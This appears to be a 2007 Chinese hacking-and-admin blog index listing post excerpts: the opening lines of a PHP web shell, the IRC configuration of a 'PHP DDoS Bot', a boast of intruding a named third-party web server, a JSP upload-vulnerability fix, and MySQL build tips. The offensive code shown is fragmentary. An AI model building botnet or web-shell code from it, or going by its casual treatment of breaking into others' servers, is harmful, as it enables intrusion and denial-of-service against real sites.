![]() |
|
服务器地址:http://eset.corbie.com.cn
本站重新开放注册,大家赶快下有用的资源....
nod32服务器升级即时信息统计系统地址:http://corbie.9966.org
客户端下载地址: http://www.corbie.com.cn/nod32.rar
shell.php
作者:Corbie 日期:2007-12-16 15:23
error_reporting(7);
//设定错误讯息回报的等级
ob_start();
//打开缓冲区,当缓冲区激活时,所有来自PHP程序的非文件头信息均不会发送,而是保存在内部缓冲区。为了输出缓冲区的内容,可以使用ob_end_flush()或flush()输出缓冲区的内容。
$mtime = explode(' ', microtime());
$starttime = $mtime[1] + $mtime[0];
@set_time_limit(0);
//非安全模式可以使用上面的函数,超时取消。
PHP DDoS Bot
作者:Corbie 日期:2007-12-16 15:18
/*
PHP ddos bot
Version 1.0
*/
$server="1.3.3.7";
$Port="6667";
$nick="bot-";$willekeurig;
$willekeurig=mt_rand(0,3);
$nicknummer=mt_rand(100000,999999);
$Channel="#WauShare";
$Channelpass="ddos";
$msg="Farewell.";
立次存照
作者:Syber 日期:2007-12-14 17:43
- InterlockedIncrement
- InterlockedDecrement
只是这里用于增减变量的并不是常用的Inc/Dec过程,而是用了InterlockedIncrement/InterlockedDecrement这一对过程,它们实现的功能完全一样,都是对变量加一或减一。但它们有一个最大的区别,那就是InterlockedIncrement/InterlockedDecrement是线程安全的。即它们在多线程下能保证执行结果正确,而Inc/Dec不能。
puline JSP上传漏洞修复
作者:Corbie 日期:2007-12-14 12:48
漏洞地址:http://www.puline.com/manage/filesystem/upfile_iframe.jsp
漏洞说明:不经过验证直接得到上传地址,并支持各种格式上传.

解决方法:
在upfile_iframe.jsp head区加上以下代码
- <%@ include file="../include/config.jsp" %>
- <%@ page session="true" %>
- <%@ page import="java.sql.*" %>
- <%@ page import="javax.servlet.*" %>
- <%@ page import="javax.servlet.http.*" %>
- <%@ page language="java" import="puline.*" %>
- <%@ page import= "java.text.SimpleDateFormat"%>
- <%@ page contentType="text/html;charset=gb2312" %>
- <%
- sysproedomclass sysadmin=new sysproedomclass();
- if (!sysadmin.getlogined(session)) {
- response.sendRedirect("../login.jsp");
- }
成功入侵Web Server: www.nowhelp.cn
作者:Corbie 日期:2007-12-13 21:29
| 以下是引用片段: Web Server: www.nowhelp.cn Soft:GoCom信息平台
|
php写了一个清除网页木马的小程序。
作者:Syber 日期:2007-12-13 14:02
入侵!
作者:Corbie 日期:2007-12-11 18:22
debian编译mysql 5.0 出现错误的解决方法
作者:Syber 日期:2007-12-11 15:30
apt-get install build-essential
在编译Mysql时
./configure --prefix=DIR
,如果出现了以下错误:
......
checking for tgetent in -ltermcap... no
checking for termcap functions library... configure: error: No curses/termcap library found
说明 curses/termcap 库没有安装
apt-cache search curses | grep lib
安装 libncurses5-dev ,然后重新运行配置
apt-get install libncurses5-dev









